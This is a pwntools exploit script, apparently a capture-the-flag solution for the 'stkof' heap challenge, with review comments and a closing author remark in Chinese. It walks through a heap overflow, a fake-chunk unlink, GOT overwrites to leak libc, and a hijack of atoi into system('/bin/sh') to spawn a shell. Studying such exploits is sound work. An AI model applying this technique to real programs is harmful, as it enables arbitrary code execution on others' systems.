from pwn import *
# Target process plus the two ELF images the script resolves symbols from.
p = process("./stkof")
libc = ELF("./libc.so.6")  # libc the target loads; every offset below is read from this file
elf = ELF("./stkof")       # challenge binary, used for its GOT/PLT addresses
def create(size):
    """Menu option 1: allocate a chunk of `size` bytes, then wait for the OK banner."""
    for line in ('1', str(size)):
        p.sendline(line)
    p.recvuntil('OK\n')
def edit(index, size, content):
    """Menu option 2: write `content` into chunk `index`, then wait for the OK banner.

    `size` is forwarded to the program as given; nothing here bounds it to the
    chunk's allocation, which is what the overflow below relies on.
    """
    for line in ('2', str(index), str(size), content):
        p.sendline(line)
    p.recvuntil('OK\n')
def free(index):
    """Menu option 3: free chunk `index`.

    Unlike create()/edit() this deliberately does not consume the OK banner:
    after free(1) the caller has to read the leaked bytes that arrive before it.
    """
    for line in ('3', str(index)):
        p.sendline(line)
# NOTE(review): the script mixes str and p64() bytes ('a'*8 + p64(...),
# .ljust(8, '\x00')), so it only runs under Python 2 pwntools.
# NOTE(review): the author's closing remark says it does not work on Ubuntu 18;
# presumably glibc >= 2.26 (tcache) keeps the freed chunk out of the
# consolidation/unlink path this depends on — confirm before relying on it.
#
# --- Stage 1: heap overflow + unlink, so one chunk-table slot is rewritten ---
address=0x602140  # address whose +16 slot the fake chunk's fd/bk target (taken as given; verify against the binary's data section)
create(0x100)  # chunk 1 (the program numbers chunks from 1, see free(3) below)
create(0x30)   # chunk 2: the overflow source
create(0x80)   # chunk 3: 0x90-byte chunk whose header the overflow rewrites
# Fake free chunk at the start of chunk 2's data:
#   prev_size=0, size=0x20, fd=address+16-0x18, bk=address+16-0x10
# fd->bk and bk->fd both resolve to address+16, which the unlink sanity check
# (fd->bk == p && bk->fd == p) compares against; this presumably is the slot
# that holds chunk 2's pointer, so the check passes.
payload=p64(0)+p64(0x20)+p64(address+16-0x18)+p64(address+16-0x10)+p64(0x20)
payload=payload.ljust(0x30,'a')  # pad to the end of chunk 2's usable area
# chunk 3 header: prev_size=0x30 (back to the fake chunk), size=0x90 with
# PREV_INUSE clear, so free(3) consolidates backwards and unlinks the fake chunk.
payload+=p64(0x30)+p64(0x90)
edit(2,len(payload),payload)  # len(payload) > 0x30: this write is the overflow
free(3)  # unlink: *(address+16) becomes address+16-0x18 (= address-8)
p.recvuntil('OK\n')  # free() does not consume the banner itself
# --- Stage 2: slot 2 now points 8 bytes before the table, so edit(2) rewrites slots 0..2 ---
# slot 0 -> free@GOT, slot 1 -> puts@GOT, slot 2 -> atoi@GOT.
# Requires a writable GOT (i.e. the binary is not built with Full RELRO).
payload1='a'*8+p64(elf.got['free'])+p64(elf.got['puts'])+p64(elf.got['atoi'])
edit(2,len(payload1),payload1)
edit(0,len(p64(elf.plt['puts'])),p64(elf.plt['puts']))  # free@GOT := puts@PLT
free(1)  # now puts(slot 1) == puts(puts@GOT): leaks the resolved puts address (assumes puts was already resolved)
# Leak is the raw pointer followed by '\nOK\n'; pad to 8 bytes for u64.
# Assumes the pointer bytes contain no '\n', otherwise recvuntil stops early.
puts_addr = p.recvuntil('\nOK\n',drop=True).ljust(8, '\x00')
puts_addr = u64(puts_addr)
libc_base=puts_addr-libc.symbols['puts']
system_addr=libc_base+libc.symbols['system']
binsh=libc_base+next(libc.search('/bin/sh'))
log.success('puts addr: ' + hex(puts_addr))
log.success('libc base: ' + hex(libc_base))
log.success('/bin/sh addr: ' + hex(binsh))
log.success('system addr: ' + hex(system_addr))
# --- Stage 3: slot 2 is atoi@GOT; point it at system ---
payload=p64(system_addr)
edit(2,len(payload),payload)
p.sendline(p64(binsh))  # the next menu line is read and handed to the patched atoi entry
p.interactive()
# 难受，好不容易写出来，结果发现网上说 Ubuntu 18 上测试不了 (Frustrating: after finally getting this written, I found reports online that it cannot be tested on Ubuntu 18.)